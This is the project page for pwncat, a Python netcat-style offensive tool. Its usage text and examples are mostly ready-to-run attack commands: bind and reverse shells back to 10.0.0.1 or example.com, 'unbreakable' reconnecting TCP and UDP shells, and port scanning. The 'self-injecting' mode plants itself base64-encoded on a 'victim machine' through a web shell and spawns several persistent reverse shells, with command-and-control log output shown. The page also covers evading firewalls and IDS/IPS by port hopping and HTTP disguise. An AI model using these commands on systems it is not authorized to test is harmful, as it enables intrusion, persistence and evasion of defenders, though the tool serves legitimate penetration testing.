Netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell and port forwarding magic - and its fully scriptable with Python (PSE).
Project description
Install | TL;DR | Features | Behaviour | Docs | Usage | Examples | FAQ | Contributing | Disclaimer | License
pwncat
Netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and its fully scriptable with Python (PSE).
Code Style | Integration Tests [2] | |||||||||||||||||||||||||||||||||||||||||||||
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[1] mypy type coverage (fully typed: 93.84%)
[2] Failing builds do not indicate broken functionality. Integration tests run for multiple hours and break sporadically for various different reasons (network timeouts, unknown cancellations of GitHub Actions, etc): #735, #841
Motivation
Ever accidentally hit Ctrl+c on your reverse shell and it was gone for good?
Ever waited forever for your client to connect back to you, because the Firewall didn't let it out?
Ever had a connection loss because an IPS closed suspicious ports?
Ever were in need of a quick port forwarding?
This one got you covered.
Apart from that the current features of nc
, ncat
or socat
just didn't feed my needs and I also wanted to have a single
tool that works on older and newer machines (hence Python 2+3 compat). Most importantly I wanted to have it in a language that I can understand and provide my own features with.
(Wait for it, binary releases for Linux, MacOS and Windows will come shortly).
:tada: Install
Current version is: 0.1.0
Pip | ArchLinux | BlackArch |
---|---|---|
pip install pwncat |
yaourt -S pwncat |
pacman -S pwncat |
:coffee: TL;DR
This is just a quick get-you-started overview. For more advanced techniques see :computer: Usage or :bulb: Examples.
See in action
unbreakable reverse shells - how to spawn |
unbreakable reverse shells - multiple shells |
Deploy to target
# Copy base64 data to clipboard from where you have internet access
curl https://raw.githubusercontent.com/cytopia/pwncat/master/bin/pwncat | base64
# Paste it on the target machine
echo "<BASE64 STRING>" | base64 -d > pwncat
chmod +x pwncat
Inject to target
# [1] If you found a vulnerability on the target to start a very simple reverse shell,
# such as via bash, php, perl, python, nc or similar, you can instruct your local
# pwncat listener to use this connection to deploy itself on the target automatically
# and start an additional unbreakable reverse shell back to you.
pwncat -l 4444 --self-inject /bin/bash:10.0.0.1:4445
Summon shells
# Bind shell (accepts new clients after disconnect)
pwncat -l -e '/bin/bash' 8080 -k
# Reverse shell (Ctrl+c proof: reconnects back to you)
pwncat -e '/bin/bash' example.com 4444 --reconn --recon-wait 1
# Reverse UDP shell (Ctrl+c proof: reconnects back to you)
pwncat -e '/bin/bash' example.com 4444 -u --ping-intvl 1
Port scan
# [TCP] IPv4 + IPv6
pwncat -z 10.0.0.1 80,443,8080
pwncat -z 10.0.0.1 1-65535
pwncat -z 10.0.0.1 1+1023
# [UDP] IPv4 + IPv6
pwncat -z 10.0.0.1 80,443,8080 -u
pwncat -z 10.0.0.1 1-65535 -u
pwncat -z 10.0.0.1 1+1023 -u
# Use only IPv6 or IPv4
pwncat -z 10.0.0.1 1-65535 -4
pwncat -z 10.0.0.1 1-65535 -6 -u
# Add version detection
pwncat -z 10.0.0.1 1-65535 --banner
Local port forward -L
(listening proxy)
# Make remote MySQL server (remote port 3306) available on current machine
# on every interface on port 5000
pwncat -L 0.0.0.0:5000 everythingcli.org 3306
# Same, but convert traffic on your end to UDP
pwncat -L 0.0.0.0:5000 everythingcli.org 3306 -u
Remote port forward -R
(double client proxy)
# Connect to Remote MySQL server (remote port 3306) and then connect to another
# pwncat/netcat server on 10.0.0.1:4444 and bridge traffic
pwncat -R 10.0.0.1:4444 everythingcli.org 3306
# Same, but convert traffic on your end to UDP
pwncat -R 10.0.0.1:4444 everythingcli.org 3306 -u
SSH Tunnelling for fun and profit :link:
pwncat
example: Port forwarding magic
:star: Features
At a glance
pwncat
has many features, below is only a list of outstanding characteristics.
Feature | Description |
---|---|
PSE | Fully scriptable with Pwncat Scripting Engine to allow all kinds of fancy stuff on send and receive |
port scanning | TCP und UDP port scanning with basic version detection support |
Self-injecting rshell | Self-injecting mode to deploy itself and start an unbreakable reverse shell back to you automatically |
Bind shell | Create bind shells |
Reverse shell | Create reverse shells |
Port Forward | Local and remote port forward (Proxy server/client) |
Ctrl+c | Reverse shell can reconnect if you accidentally hit Ctrl+c |
Detect Egress | Scan and report open egress ports on the target (port hopping) |
Evade FW | Evade egress firewalls by round-robin outgoing ports (port hopping) |
Evade IPS | Evade Intrusion Prevention Systems by being able to round-robin outgoing ports on connection interrupts (port hopping) |
UDP rev shell | Try this with the traditional netcat |
Stateful UDP | Stateful connect phase for UDP client mode |
TCP / UDP | Full TCP and UDP support |
IPv4 / IPv6 | Dual or single stack IPv4 and IPv6 support |
Python 2+3 | Works with Python 2, Python 3, pypy2 and pypy3 |
Cross OS | Work on Linux, MacOS and Windows as long as Python is available |
Compatability | Use the netcat , ncat or socat as a client or server together with pwncat |
Portable | Single file which only uses core packages - no external dependencies required. |
Feature comparison matrix
pwncat | netcat | ncat | socat | |
---|---|---|---|---|
Scripting engine | ✔ Python | :x: | ✔ Lua | :x: |
IP ToS | ✔ | ✔ | :x: | ✔ |
IPv4 | ✔ | ✔ | ✔ | ✔ |
IPv6 | ✔ | ✔ | ✔ | ✔ |
Unix domain sockets | :x: | ✔ | ✔ | ✔ |
Linux vsock | :x: | :x: | ✔ | :x: |
Socket source bind | ✔ | ✔ | ✔ | ✔ |
TCP | ✔ | ✔ | ✔ | ✔ |
UDP | ✔ | ✔ | ✔ | ✔ |
SCTP | :x: | :x: | ✔ | ✔ |
SSL | :x: | :x: | ✔ | ✔ |
HTTP | ✔ | :x: | :x: | :x: |
HTTPS | * | :x: | :x: | :x: |
Telnet negotiation | :x: | ✔ | ✔ | :x: |
Proxy support | :x: | ✔ | ✔ | ✔ |
Local port forward | ✔ | :x: | :x: | ✔ |
Remote port forward | ✔ | :x: | :x: | :x: |
Inbound port scan | ✔ | ✔ | ✔ | :x: |
Outbound port scan | ✔ | :x: | :x: | :x: |
Version detection | ✔ | :x: | :x: | :x: |
Chat | ✔ | ✔ | ✔ | ✔ |
Command execution | ✔ | ✔ | ✔ | ✔ |
Hex dump | * | ✔ | ✔ | ✔ |
Broker | :x: | :x: | ✔ | :x: |
Simultaneous conns | :x: | :x: | ✔ | ✔ |
Allow/deny | :x: | :x: | ✔ | ✔ |
Re-accept | ✔ | ✔ | ✔ | ✔ |
Self-injecting | ✔ | :x: | :x: | :x: |
UDP reverse shell | ✔ | :x: | :x: | :x: |
Respawning client | ✔ | :x: | :x: | :x: |
Port hopping | ✔ | :x: | :x: | :x: |
Emergency shutdown | ✔ | :x: | :x: | :x: |
*
Feature is currently under development.
:cop: Behaviour
Like the original implementation of netcat
, when using TCP, pwncat
(in client and listen mode) will automatically quit, if the network connection has been terminated,
properly or improperly.
In case the remote peer does not terminate the connection, or in UDP mode, netcat
and pwncat
will stay open. The behaviour differs a bit when STDIN is closed.
netcat
: If STDIN is closed, but connection stays open,netcat
will stay openpwncat
: If STDIN is closed, but connection stays open,pwncat
will close
You can emulate the netcat
behaviour with --no-shutdown
command line argument.
Have a look at the following commands to better understand this behaviour:
# [Valid HTTP request] Quits, web server keeps connection intact, but STDIN is EOF
printf "GET / HTTP/1.1\n\n" | pwncat www.google.com 80
# [Valid HTTP request] Does not quit, web server keeps connection intact, but STDIN is EOF
printf "GET / HTTP/1.1\n\n" | pwncat www.google.com 80 --no-shutdown
# [Invalid HTTP request] Quits, because the web server closes the connection and STDIN is EOF
printf "GET / \n\n" | pwncat www.google.com 80
# [TCP]
# Both instances will quit after successful file transfer.
pwncat -l 4444 > output.txt
pwncat localhost 4444 < input.txt
# [TCP]
# Neither of both, client and server will quit after successful transfer
# and they will be stuck, waiting for more input or output.
# When exiting one (e.g.: via Ctrl+c), the other one will quit as well.
pwncat -l 4444 --no-shutdown > output.txt
pwncat localhost 4444 --no-shutdown < input.txt
Be advised that it is not reliable to send files via UDP
# [UDP] (--no-shutdown has no effect, as this is the default behaviour in UDP)
# Neither of both, client and server will quit after successful transfer
# and they will be stuck, waiting for more input or output.
# When exiting one (e.g.: via Ctrl+c), the other one will still stay open in UDP mode.
pwncat -u -l 4444 > output.txt
pwncat -u localhost 4444 < input.txt
There are many ways to alter this default behaviour. Have a look at the usage section for more advanced settings.
:closed_book: Documentation
Documentation will evolve over time.
- API docs can be found here: pwncat.api.html
- Python type coverage can be found here: pwncat.type.html
- HTML man page can be found here: pwncat.man.html
- Raw man page can be found here: pwncat.1
:computer: Usage
Keys
Behaviour | |||
---|---|---|---|
Quit (SIGINT) | Ctrl+c | Ctrl+c | Ctrl+c |
Quit (SIGQUIT) | Ctrl+\ | ? | ? |
Quit (SIGQUIT) | Ctrl+4 | ? | ? |
Quit STDIN[1] | Ctrl+d | Ctrl+d | Ctrl+z and Ctrl+Enter |
Send (NL) | Ctrl+j | ? | ? |
Send (EOL) | Ctrl+m | ? | ? |
Send (EOL) | Enter | Enter | Enter |
[1] Only works when not using
--no-shutdown
and--keep
. Will then shutdown it's socket for sending, signaling the remote end and EOF on its socket.
Command line arguments
Type pwncat -h
or click below to see all available options.
Click here to expand usage
usage: pwncat [options] hostname port
pwncat [options] -l [hostname] port
pwncat [options] -z hostname port
pwncat [options] -L [addr:]port hostname port
pwncat [options] -R addr:port hostname port
pwncat -V, --version
pwncat -h, --help
Enhanced and comptaible Netcat implementation written in Python (2 and 3) with
connect, zero-i/o, listen and forward modes and techniques to detect and evade
firewalls and intrusion detection/prevention systems.
If no mode arguments are specified, pwncat will run in connect mode and act as
a client to connect to a remote endpoint. If the connection to the remote
endoint is lost, pwncat will quit. See options for how to automatically re-
connect.
positional arguments:
hostname Address to listen, forward, scan or connect to.
port [All modes]
Single port to listen, forward or connect to.
[Zero-I/O mode]
Specify multiple ports to scan:
Via list: 4444,4445,4446
Via range: 4444-4446
Via incr: 4444+2
mode arguments:
-l, --listen [Listen mode]:
Start a server and listen for incoming connections.
If using TCP and a connected client disconnects or the
connection is interrupted otherwise, the server will
quit. See -k/--keep-open to change this behaviour.
-z, --zero [Zero-I/0 mode]:
Connect to a remote endpoint and report status only.
Used for port scanning.
See --banner for version detection.
-L [addr:]port, --local [addr:]port
[Local forward mode]:
This mode will start a server and a client internally.
The internal server will listen locally on specified
addr/port (given by --local [addr:]port).
The server will then forward traffic to the internal
client which connects to another server specified by
hostname/port given via positional arguments.
(I.e.: proxies a remote service to a local address)
-R addr:port, --remote addr:port
[Remote forward mode]:
This mode will start two clients internally. One is
connecting to the target and one is connecting to
another pwncat/netcat server you have started some-
where. Once connected, it will then proxy traffic
between you and the target.
This mode should be applied on machines that block
incoming traffic and only allow outbound.
The connection to your listening server is given by
-R/--remote addr:port and the connection to the
target machine via the positional arguments.
optional arguments:
-e cmd, --exec cmd Execute shell command. Only for connect or listen mode.
-C lf, --crlf lf Specify, 'lf', 'crlf' or 'cr' to always force replacing
line endings for input and outout accordingly. Specify
'no' to completely remove any line feeds. By default
it will not replace anything and takes what is entered
(usually CRLF on Windows, LF on Linux and some times
CR on MacOS).
-n, --nodns Do not resolve DNS.
--send-on-eof Buffer data received on stdin until EOF and send
everything in one chunk.
--no-shutdown Do not shutdown into half-duplex mode.
If this option is passed, pwncat won't invoke shutdown
on a socket after seeing EOF on stdin. This is provided
for backward-compatibility with OpenBSD netcat, which
exhibits this behavior.
-v, --verbose Be verbose and print info to stderr. Use -v, -vv, -vvv
or -vvvv for more verbosity. The server performance will
decrease drastically if you use more than three times.
--info type Show additional info about sockets, IPv4/6 or TCP opts
applied to the current socket connection. Valid
parameter are 'sock', 'ipv4', 'ipv6', 'tcp' or 'all'.
Note, you must at least be in INFO verbose mode in order
to see them (-vv).
-c str, --color str Colored log output. Specify 'always', 'never' or 'auto'.
In 'auto' mode, color is displayed as long as the output
goes to a terminal. If it is piped into a file, color
will automatically be disabled. This mode also disables
color on Windows by default. (default: auto)
--safe-word str All modes:
If pwncat is started with this argument, it will shut
down as soon as it receives the specified string. The
--keep-open (server) or --reconn (client) options will
be ignored and it won't listen again or reconnect to you.
Use a very unique string to not have it shut down
accidentally by other input.
protocol arguments:
-4 Only Use IPv4 (default: IPv4 and IPv6 dualstack).
-6 Only Use IPv6 (default: IPv4 and IPv6 dualstack).
-u, --udp Use UDP for the connection instead of TCP.
-T str, --tos str Specifies IP Type of Service (ToS) for the connection.
Valid values are the tokens 'mincost', 'lowcost',
'reliability', 'throughput' or 'lowdelay'.
--http Connect / Listen mode (TCP and UDP):
Hide traffic in http packets to fool Firewalls/IDS/IPS.
--https Connect / Listen mode (TCP and UDP):
Hide traffic in https packets to fool Firewalls/IDS/IPS.
-H [str [str ...]], --header [str [str ...]]
Add HTTP headers to your request when using --http(s).
command & control arguments:
--self-inject cmd:host:port[s]
Listen mode (TCP only):
If you are about to inject a reverse shell onto the
victim machine (via php, bash, nc, ncat or similar),
start your listening server with this argument.
This will then (as soon as the reverse shell connects)
automatically deploy and background-run an unbreakable
pwncat reverse shell onto the victim machine which then
also connects back to you with specified arguments.
Example: '--self-inject /bin/bash:10.0.0.1:4444'
It is also possible to launch multiple reverse shells by
specifying multiple ports.
Via list: --self-inject /bin/sh:10.0.0.1:4444,4445,4446
Via range: --self-inject /bin/sh:10.0.0.1:4444-4446
Via incr: --self-inject /bin/sh:10.0.0.1:4444+2
Note: this is currently an experimental feature and does
not work on Windows remote hosts yet.
pwncat scripting engine:
--script-send file All modes (TCP and UDP):
A Python scripting engine to define your own custom
transformer function which will be executed before
sending data to a remote endpoint. Your file must
contain the exact following function which will:
be applied as the transformer:
def transform(data, pse):
# NOTE: the function name must be 'transform'
# NOTE: the function param name must be 'data'
# NOTE: indentation must be 4 spaces
# ... your transformations goes here
return data
You can also define as many custom functions or classes
within this file, but ensure to prefix them uniquely to
not collide with pwncat's function or classes, as the
file will be called with exec().
--script-recv file All modes (TCP and UDP):
A Python scripting engine to define your own custom
transformer function which will be executed after
receiving data from a remote endpoint. Your file must
contain the exact following function which will:
be applied as the transformer:
def transform(data, pse):
# NOTE: the function name must be 'transform'
# NOTE: the function param name must be 'data'
# NOTE: indentation must be 4 spaces
# ... your transformations goes here
return data
You can also define as many custom functions or classes
within this file, but ensure to prefix them uniquely to
not collide with pwncat's function or classes, as the
file will be called with exec().
zero-i/o mode arguments:
--banner Zero-I/O (TCP and UDP):
Try banner grabbing during port scan.
listen mode arguments:
-k, --keep-open Listen mode (TCP only):
Re-accept new clients in listen mode after a client has
disconnected or the connection is unterrupted otherwise.
(default: server will quit after connection is gone)
--rebind [x] Listen mode (TCP and UDP):
If the server is unable to bind, it will re-initialize
itself x many times before giving up. Omit the
quantifier to rebind endlessly or specify a positive
integer for how many times to rebind before giving up.
See --rebind-robin for an interesting use-case.
(default: fail after first unsuccessful try).
--rebind-wait s Listen mode (TCP and UDP):
Wait x seconds between re-initialization. (default: 1)
--rebind-robin port Listen mode (TCP and UDP):
If the server is unable to initialize (e.g: cannot bind
and --rebind is specified, it it will shuffle ports in
round-robin mode to bind to.
Use comma separated string such as '80,81,82,83', a range
of ports '80-83' or an increment '80+3'.
Set --rebind to at least the number of ports to probe +1
This option requires --rebind to be specified.
connect mode arguments:
--source-addr addr Specify source bind IP address for connect mode.
--source-port port Specify source bind port for connect mode.
--reconn [x] Connect mode (TCP and UDP):
If the remote server is not reachable or the connection
is interrupted, the client will connect again x many
times before giving up. Omit the quantifier to retry
endlessly or specify a positive integer for how many
times to retry before giving up.
(default: quit if the remote is not available or the
connection was interrupted)
This might be handy for stable TCP reverse shells ;-)
Note on UDP:
By default UDP does not know if it is connected, so
it will stop at the first port and assume it has a
connection. Consider using --udp-sconnect with this
option to make UDP aware of a successful connection.
--reconn-wait s Connect mode (TCP and UDP):
Wait x seconds between re-connects. (default: 1)
--reconn-robin port Connect mode (TCP and UDP):
If the remote server is not reachable or the connection
is interrupted and --reconn is specified, the client
will shuffle ports in round-robin mode to connect to.
Use comma separated string such as '80,81,82,83', a range
of ports '80-83' or an increment '80+3'.
Set --reconn to at least the number of ports to probe +1
This helps reverse shell to evade intrusiona prevention
systems that will cut your connection and block the
outbound port.
This is also useful in Connect or Zero-I/O mode to
figure out what outbound ports are allowed.
--ping-init Connect mode (TCP and UDP):
UDP is a stateless protocol unlike TCP, so no hand-
shake communication takes place and the client just
sends data to a server without being "accepted" by
the server first.
This means a server waiting for an UDP client to
connect to, is unable to send any data to the client,
before the client hasn't send data first. The server
simply doesn't know the IP address before an initial
connect.
The --ping-init option instructs the client to send one
single initial ping packet to the server, so that it is
able to talk to the client.
This is a way to make a UDP reverse shell work.
See --ping-word for what char/string to send as initial
ping packet (default: '\0')
--ping-intvl s Connect mode (TCP and UDP):
Instruct the client to send ping intervalls every s sec.
This allows you to restart your UDP server and just wait
for the client to report back in. This might be handy
for stable UDP reverse shells ;-)
See --ping-word for what char/string to send as initial
ping packet (default: '\0')
--ping-word str Connect mode (TCP and UDP):
Change the default character '\0' to use for upd ping.
Single character or strings are supported.
--ping-robin port Connect mode (TCP and UDP):
Instruct the client to shuffle the specified ports in
round-robin mode for a remote server to ping.
This might be handy to scan outbound allowed ports.
Use comma separated string such as '80,81,82,83', a range
of ports '80-83' or an increment '80+3'.
Use --ping-intvl 0 to be faster.
--udp-sconnect Connect mode (UDP only):
Emulating stateful behaviour for UDP connect phase by
sending an initial packet to the server to validate if
it is actually connected.
By default, UDP will simply issue a connect and is not
aware if it is really connected or not.
The default connect packet to be send is '\0', you
can change this with --udp-sconnect-word.
--udp-sconnect-word [str]
Connect mode (UDP only):
Change the the data to be send for UDP stateful connect
behaviour. Note you can also omit the string to send an
empty packet (EOF), but be aware that some servers such
as netcat will instantly quit upon receive of an EOF
packet.
The default is to send a null byte sting: '\0'.
misc arguments:
-h, --help Show this help message and exit
-V, --version Show version information and exit
:bulb: Examples
Upgrade your shell to interactive
This is a universal advice and not only works with
pwncat
, but with all other common tools.
When connected with a reverse or bind shell you'll notice that no interactive commands will work and hitting Ctrl+c will terminate your session. To fix this, you'll need to attach it to a TTY (make it interactive). Here's how:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+z
# get your current terminal size (rows and columns)
stty size
# for bash/sh (enter raw mode and disable echo'ing)
stty raw -echo
fg
# for zsh (enter raw mode and disable echo'ing)
stty raw -echo; fg
reset
export SHELL=bash
export TERM=xterm
stty rows <num> columns <cols> # <num> and <cols> values found above by 'stty size'
UDP reverse shell
Without tricks a UDP reverse shell is not really possible. UDP is a stateless protocol compared to TCP and does not have a connect()
method as TCP does.
In TCP mode, the server will know the client IP and port, once the client issues a connects()
.
In UDP mode, as there is no connect()
, the client simply sends data to an address/port without having to connect first.
Therefore, in UDP mode, the server will not be able to know the IP and port of the client and hence, cannot send data to it first.
The only way to make this possible is to have the client send some sort of data to the server first, so that the server can see what IP/port has sent data to it.
pwncat
emulates the TCP connect()
by having the client send a null byte to the server once or periodically via --ping-intvl
or --ping-init
.
# The client
# --exec # Provide this executable
# --udp # Use UDP mode
# --ping-init # Send an initial null byte to the server
pwncat --exec /bin/bash --udp --ping-init 10.0.0.1 4444
Unbreakable TCP reverse shell
Why unbreakable? Because it will keep coming back to you, even if you kill your listening server temporarily. In other words, the client will keep trying to connect to the specified server until success. If the connection is interrupted, it will keep trying again.
# The client
# --exec # Provide this executable
# --nodns # Keep the noise down and don't resolve hostnames
# -reconn # Automatically reconnect back to you indefinitely
# --reconn-wait # If connection is lost, connect back to you every 2 seconds
pwncat --exec /bin/bash --nodns --reconn --reconn-wait 2 10.0.0.1 4444
Unbreakable UDP reverse shell
Why unbreakable? Because it will keep coming back to you, even if you kill your listening server temporarily. In other words, the client will keep sending null bytes to the server to constantly announce itself.
# The client
# --exec # Provide this executable
# --nodns # Keep the noise down and don't resolve hostnames
# --udp # Use UDP mode
# --ping-intvl # Ping the server every 2 seconds
pwncat --exec /bin/bash --nodns --udp --ping-intvl 2 10.0.0.1 4444
Self-injecting reverse shell
Let's imagine you are able to create a very simple and unstable reverse shell from the target to
your machine, such as a web shell via a PHP script or similar.
Knowing, that this will not persist very long or might break due to unstable network connection,
you could use pwncat
to hook into this connection and deploy itself unbreakably on the target - fully automated.
All you have to do, is use pwncat
as your local listener and start it with the --self-inject
switch. As soon as the client (e.g.: the reverse web shell) connects to it, it will do a couple of things:
- Enumerate Python availability and versions on the target
- Dump itself base64 encoded onto the target
- Use the target's Python to decode itself.
- Use the target's Python to start itself as an unbreakable reverse shell back to you
Once this is done, you can keep using the current connection or simply abandon it and start a new
listener (yes, you don't need to start the listener before starting the reverse shell) to have
the new pwncat
client connect to you. The new listener also doesn't have to be pwncat
, it can
also be netcat
or ncat
.
The --self-inject
switch:
pwncat -l 4444 --self-inject <cmd>:<host>:<port>
<cmd>
: This is the command to start on the target (like-e
/--exec
, so you want it to becmd.exe
or/bin/bash
)<host>
: This is for your local machine, the IP address to where the reverse shell shall connect back to<port>
: This is for your local machine, the port on which the reverse shell shall connect back to
So imagine your Kali machine is 10.0.0.1. You instruct your webshell that you inject onto a Linux server to connect to you at port 4444
:
# Start this locally, before starting the reverse webshell
pwncat -l 4444 --self-inject /bin/bash:10.0.0.1:4445
You will then see something like this:
[PWNCAT CnC] Probing for: /bin/python
[PWNCAT CnC] Probing for: /bin/python2
[PWNCAT CnC] Probing for: /bin/python2.7
[PWNCAT CnC] Probing for: /bin/python3
[PWNCAT CnC] Probing for: /bin/python3.5
[PWNCAT CnC] Probing for: /bin/python3.6
[PWNCAT CnC] Probing for: /bin/python3.7
[PWNCAT CnC] Probing for: /bin/python3.8
[PWNCAT CnC] Probing for: /usr/bin/python
[PWNCAT CnC] Potential path: /usr/bin/python
[PWNCAT CnC] Found valid Python2 version: 2.7.16
[PWNCAT CnC] Creating tmpfile: /tmp/tmp3CJ8Us
[PWNCAT CnC] Creating tmpfile: /tmp/tmpgHg7YT
[PWNCAT CnC] Uploading: /home/cytopia/tmp/pwncat/bin/pwncat -> /tmp/tmpgHg7YT (3422/3422)
[PWNCAT CnC] Decoding: /tmp/tmpgHg7YT -> /tmp/tmp3CJ8Us
Starting pwncat rev shell: nohup /usr/bin/python /tmp/tmp3CJ8Us --exec /bin/bash --reconn --reconn-wait 1 10.0.0.1 4445 &
And you are set. You can now start another listener locally at 4445
(again, it will connect back to you endlessly, so it is not required to start the listener first).
# either netcat
nc -lp 4445
# or ncat
ncat -l 4445
# or pwncat
pwncat -l 4445
Unlimited self-injecting reverse shells
Instead of just asking for a single self-injecting reverse shell, you can instruct pwncat
to spawn as many unbreakable reverse shells connecting back to you as you desire.
The --self-inject
argument allows you to not only define a single port, but also
- A comma separated list of ports:
4445,4446,4447,4448
- A range definition:
4446-4448
- An increment:
4445+3
In order to spawn 4 reverse shells you would start your listener just as described above, but instead of a single port, you define multiple:
# Comma separated
pwncat -l 4444 --self-inject /bin/bash:10.0.0.1:4445,4446,4447,4448
# Range
pwncat -l 4444 --self-inject /bin/bash:10.0.0.1:4445-4448
# Increment
pwncat -l 4444 --self-inject /bin/bash:10.0.0.1:4445+3
Each of the above three commands will achieve the same behaviour: spawning 4 reverse shells inside the target. Once the client connects, the output will look something like this:
[PWNCAT CnC] Probing for: /bin/python
[PWNCAT CnC] Probing for: /bin/python2
[PWNCAT CnC] Probing for: /bin/python2.7
[PWNCAT CnC] Probing for: /bin/python3
[PWNCAT CnC] Probing for: /bin/python3.5
[PWNCAT CnC] Probing for: /bin/python3.6
[PWNCAT CnC] Probing for: /bin/python3.7
[PWNCAT CnC] Probing for: /bin/python3.8
[PWNCAT CnC] Probing for: /usr/bin/python
[PWNCAT CnC] Potential path: /usr/bin/python
[PWNCAT CnC] Found valid Python2 version: 2.7.16
[PWNCAT CnC] Creating tmpfile: /tmp/tmp3CJ8Us
[PWNCAT CnC] Creating tmpfile: /tmp/tmpgHg7YT
[PWNCAT CnC] Uploading: /home/cytopia/tmp/pwncat/bin/pwncat -> /tmp/tmpgHg7YT (3422/3422)
[PWNCAT CnC] Decoding: /tmp/tmpgHg7YT -> /tmp/tmp3CJ8Us
Starting pwncat rev shell: nohup /usr/bin/python /tmp/tmp3CJ8Us --exec /bin/bash --reconn --reconn-wait 1 10.0.0.1 4445 &
Starting pwncat rev shell: nohup /usr/bin/python /tmp/tmp3CJ8Us --exec /bin/bash --reconn --reconn-wait 1 10.0.0.1 4446 &
Starting pwncat rev shell: nohup /usr/bin/python /tmp/tmp3CJ8Us --exec /bin/bash --reconn --reconn-wait 1 10.0.0.1 4447 &
Starting pwncat rev shell: nohup /usr/bin/python /tmp/tmp3CJ8Us --exec /bin/bash --reconn --reconn-wait 1 10.0.0.1 4448 &
Logging
Note: Ensure you have a reverse shell that keeps coming back to you. This way you can always change your logging settings without loosing the shell.
Log level and redirection
If you feel like, you can start a listener in full TRACE logging mode to figure out what's going on or simply to troubleshoot.
Log message are colored depending on their severity. Colors are automatically turned off, if stderr is not a pty, e.g.: if piping those to a file.
You can also manually disable colored logging for terminal outputs via the --color
switch.
pwncat -vvvv -l 4444
You will see (among all the gibberish) a TRACE message:
2020-05-11 08:40:57,927 DEBUG NetcatServer.receive(): 'Client connected: 127.0.0.1:46744'
2020-05-11 08:40:57,927 TRACE [STDIN] 1854:producer(): Command output: b'\x1b[32m[0]\x1b[0m\r\r\n'
2020-05-11 08:40:57,927 TRACE [STDIN] 2047:run_action(): [STDIN] Producer received: '\x1b[32m[0]\x1b[0m\r\r\n'
2020-05-11 08:40:57,927 DEBUG [STDIN] 815:send(): Trying to send 15 bytes to 127.0.0.1:46744
2020-05-11 08:40:57,927 TRACE [STDIN] 817:send(): Trying to send: b'\x1b[32m[0]\x1b[0m\r\r\n'
2020-05-11 08:40:57,927 DEBUG [STDIN] 834:send(): Sent 15 bytes to 127.0.0.1:46744 (0 bytes remaining)
2020-05-11 08:40:57,928 TRACE [STDIN] 1852:producer(): Reading command output
As soon as you saw this on the listener, you can issue commands to the client. All the debug messages are also not necessary, so you can safely Ctrl+c terminate your server and start it again in silent mode:
pwncat -l 4444
Now wait a maximum a few seconds, depending at what interval the client comes back to you and voila, your session is now again without logs.
Having no info messages at all, is also sometimes not desirable. You might want to know what is going on behind the scences or? Safely Ctrl+c terminate your server and redirect the notifications to a logfile:
pwncat -l -vvv 4444 2> comm.txt
Now all you'll see in your terminal session are the actual command inputs and outputs.
If you want to see what's going on behind the scene, open a second terminal window and tail
the comm.txt
file:
# View communication info
tail -fn50 comm.txt
2020-05-11 08:40:57,927 DEBUG NetcatServer.receive(): 'Client connected: 127.0.0.1:46744'
2020-05-11 08:40:57,927 TRACE [STDIN] 1854:producer(): Command output: b'\x1b[32m[0]\x1b[0m\r\r\n'
2020-05-11 08:40:57,927 TRACE [STDIN] 2047:run_action(): [STDIN] Producer received: '\x1b[32m[0]\x1b[0m\r\r\n'
2020-05-11 08:40:57,927 DEBUG [STDIN] 815:send(): Trying to send 15 bytes to 127.0.0.1:46744
2020-05-11 08:40:57,927 TRACE [STDIN] 817:send(): Trying to send: b'\x1b[32m[0]\x1b[0m\r\r\n'
2020-05-11 08:40:57,927 DEBUG [STDIN] 834:send(): Sent 15 bytes to 127.0.0.1:46744 (0 bytes remaining)
2020-05-11 08:40:57,928 TRACE [STDIN] 1852:producer(): Reading command output
Socket information
Another useful feature is to display currently configured socket and network settings.
Use the --info
switch with either socket
, ipv4
, ipv6
, tcp
or all
to display all
available settings.
Note: In order to view those settings, you must at least be at INFO
log level (-vv
).
An example output in IPv4/TCP mode without any custom settings is shown below:
INFO: [bind-sock] Sock: SO_DEBUG: 0
INFO: [bind-sock] Sock: SO_ACCEPTCONN: 1
INFO: [bind-sock] Sock: SO_REUSEADDR: 1
INFO: [bind-sock] Sock: SO_KEEPALIVE: 0
INFO: [bind-sock] Sock: SO_DONTROUTE: 0
INFO: [bind-sock] Sock: SO_BROADCAST: 0
INFO: [bind-sock] Sock: SO_LINGER: 0
INFO: [bind-sock] Sock: SO_OOBINLINE: 0
INFO: [bind-sock] Sock: SO_REUSEPORT: 0
INFO: [bind-sock] Sock: SO_SNDBUF: 16384
INFO: [bind-sock] Sock: SO_RCVBUF: 131072
INFO: [bind-sock] Sock: SO_SNDLOWAT: 1
INFO: [bind-sock] Sock: SO_RCVLOWAT: 1
INFO: [bind-sock] Sock: SO_SNDTIMEO: 0
INFO: [bind-sock] Sock: SO_RCVTIMEO: 0
INFO: [bind-sock] Sock: SO_ERROR: 0
INFO: [bind-sock] Sock: SO_TYPE: 1
INFO: [bind-sock] Sock: SO_PASSCRED: 0
INFO: [bind-sock] Sock: SO_PEERCRED: 0
INFO: [bind-sock] Sock: SO_BINDTODEVICE: 0
INFO: [bind-sock] Sock: SO_PRIORITY: 0
INFO: [bind-sock] Sock: SO_MARK: 0
INFO: [bind-sock] IPv4: IP_OPTIONS: 0
INFO: [bind-sock] IPv4: IP_HDRINCL: 0
INFO: [bind-sock] IPv4: IP_TOS: 0
INFO: [bind-sock] IPv4: IP_TTL: 64
INFO: [bind-sock] IPv4: IP_RECVOPTS: 0
INFO: [bind-sock] IPv4: IP_RECVRETOPTS: 0
INFO: [bind-sock] IPv4: IP_RETOPTS: 0
INFO: [bind-sock] IPv4: IP_MULTICAST_IF: 0
INFO: [bind-sock] IPv4: IP_MULTICAST_TTL: 1
INFO: [bind-sock] IPv4: IP_MULTICAST_LOOP: 1
INFO: [bind-sock] IPv4: IP_DEFAULT_MULTICAST_TTL: 0
INFO: [bind-sock] IPv4: IP_DEFAULT_MULTICAST_LOOP: 0
INFO: [bind-sock] IPv4: IP_MAX_MEMBERSHIPS: 0
INFO: [bind-sock] IPv4: IP_TRANSPARENT: 0
INFO: [bind-sock] TCP: TCP_NODELAY: 0
INFO: [bind-sock] TCP: TCP_MAXSEG: 536
INFO: [bind-sock] TCP: TCP_CORK: 0
INFO: [bind-sock] TCP: TCP_KEEPIDLE: 7200
INFO: [bind-sock] TCP: TCP_KEEPINTVL: 75
INFO: [bind-sock] TCP: TCP_KEEPCNT: 9
INFO: [bind-sock] TCP: TCP_SYNCNT: 6
INFO: [bind-sock] TCP: TCP_LINGER2: 60
